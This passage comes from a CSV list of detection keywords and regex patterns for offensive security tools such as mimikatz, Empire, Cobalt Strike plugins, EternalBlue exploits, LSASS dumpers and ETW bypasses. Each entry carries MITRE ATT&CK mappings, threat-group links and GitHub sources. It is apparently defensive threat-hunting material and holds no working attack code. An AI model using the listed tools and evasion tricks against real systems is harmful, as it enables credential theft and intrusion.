Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*enumdomains;quit*",".{0,1000}enumdomains\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*enumdomgroups;quit*",".{0,1000}enumdomgroups\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" 
"*enumdomusers;quit*",".{0,1000}enumdomusers\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*enumerate.cna*",".{0,1000}enumerate\.cna.{0,1000}","offensive_tool_keyword","red-team-scripts","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands (i.e. no Powershell. binary calls. or process injection). Additionally. adds a basic enumerate alias for Linux based systems in SSH sessions.","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*EnumerateAllDomainControllers*",".{0,1000}EnumerateAllDomainControllers.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*Enumerate-AllHighPrivilegePrincipals*",".{0,1000}Enumerate\-AllHighPrivilegePrincipals.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*EnumerateDomainGpo*",".{0,1000}EnumerateDomainGpo.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - 
TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","0","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" "*Enumerate-MFAStatusOfHighPrivilegePrincipals*",".{0,1000}Enumerate\-MFAStatusOfHighPrivilegePrincipals.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Enumerating Administrators group, please wait*",".{0,1000}Enumerating\sAdministrators\sgroup,\splease\swait.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*Enumerating new user, please wait*",".{0,1000}Enumerating\snew\suser,\splease\swait.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*Enumeration.Net.GetNetLocalGroupMembers(*",".{0,1000}Enumeration\.Net\.GetNetLocalGroupMembers\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*Enumeration/DesktopACL*",".{0,1000}Enumeration\/DesktopACL.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Enumeration\DesktopAC*",".{0,1000}Enumeration\\DesktopAC.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Env:TMP\ACl.log*",".{0,1000}Env\:TMP\\ACl\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*env_var_spoofing_poc.cpp*",".{0,1000}env_var_spoofing_poc\.cpp.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? 
Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*eo.oe.kiwi*",".{0,1000}eo\.oe\.kiwi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*EoP PoC exploiting the AMD driver *",".{0,1000}EoP\sPoC\sexploiting\sthe\sAMD\sdriver\s.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*EoP PoC exploiting the Intel driver *",".{0,1000}EoP\sPoC\sexploiting\sthe\sIntel\sdriver\s.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" 
"*eop_pdfwkrnl.py*",".{0,1000}eop_pdfwkrnl\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*eop_pdfwkrnl_loop.py*",".{0,1000}eop_pdfwkrnl_loop\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*eop_rtport.py*",".{0,1000}eop_rtport\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*eop_stdcdrvws64.py*",".{0,1000}eop_stdcdrvws64\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*erase_dos_magic_bytes(*",".{0,1000}erase_dos_magic_bytes\(.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*erebe/wstunnel*",".{0,1000}erebe\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*Erebus/*spacerunner*",".{0,1000}Erebus\/.{0,1000}spacerunner.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*ERPScan-tockenchpoken.zip*",".{0,1000}ERPScan\-tockenchpoken\.zip.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","1","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*Error parsing lsass dump with pypykatz*",".{0,1000}Error\sparsing\slsass\sdump\swith\spypykatz.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*eRv6yTYhShell*",".{0,1000}eRv6yTYhShell.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*erwan2212/NTHASH-FPC*",".{0,1000}erwan2212\/NTHASH\-FPC.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*ES.Alan.Core/*",".{0,1000}ES\.Alan\.Core\/.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*escalate/golden_ticket*",".{0,1000}escalate\/golden_ticket.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*escalate/unmarshal_cmd_exec*",".{0,1000}escalate\/unmarshal_cmd_exec.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" 
"*EspressoCake/PPLDump_BOF*",".{0,1000}EspressoCake\/PPLDump_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*Eternalblue-*.exe*",".{0,1000}Eternalblue\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" 
"*EternalBlue.ps1*",".{0,1000}EternalBlue\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*eternalblue.rb*",".{0,1000}eternalblue\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Eternalblue-Doublepulsar*",".{0,1000}Eternalblue\-Doublepulsar.{0,1000}","offensive_tool_keyword","Eternalblue-Doublepulsar-Metasploit","DoublePulsar vulnerability exploit. DoublePulsar is a backdoor implant tool developed by the U.S. National Security Agency's (NSA) Equation Group that was leaked by The Shadow Brokers in early 2017. The tool infected more than 200.000 Microsoft Windows computers in only a few weeks. and was used alongside EternalBlue in the May 2017 WannaCry ransomware attack. A variant of DoublePulsar was first seen in the wild in March 2016. as discovered by Symantec.","T1055 - T1218","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit","1","1","N/A","N/A","10","1071","524","2021-03-31T09:44:10Z","2017-04-24T12:41:56Z" "*EternalHushFramework-*-SNAPSHOT.jar*",".{0,1000}EternalHushFramework\-.{0,1000}\-SNAPSHOT\.jar.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*EternalHushFramework-main*",".{0,1000}EternalHushFramework\-main.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*EternalHushMain.java*",".{0,1000}EternalHushMain\.java.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*EternalHushWindow.java*",".{0,1000}EternalHushWindow\.java.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*ethereum2john.py*",".{0,1000}ethereum2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*etw-bypass*",".{0,1000}etw\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ETWEventSubscription*Program.cs*",".{0,1000}ETWEventSubscription.{0,1000}Program\.cs.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. 
When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*ETWEventSubscription.exe* -ProcStart *",".{0,1000}ETWEventSubscription\.exe.{0,1000}\s\-ProcStart\s.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*ETWEventSubscription.exe* -UserLogon*",".{0,1000}ETWEventSubscription\.exe.{0,1000}\s\-UserLogon.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. 
When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*etw-fuck.exe *",".{0,1000}etw\-fuck\.exe\s.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*EtwHash.exe*",".{0,1000}EtwHash\.exe.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","244","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*EtwHash.git*",".{0,1000}EtwHash\.git.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","244","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*ETWHash.sln*",".{0,1000}ETWHash\.sln.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","244","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*etwti-hook.*",".{0,1000}etwti\-hook\..{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - 
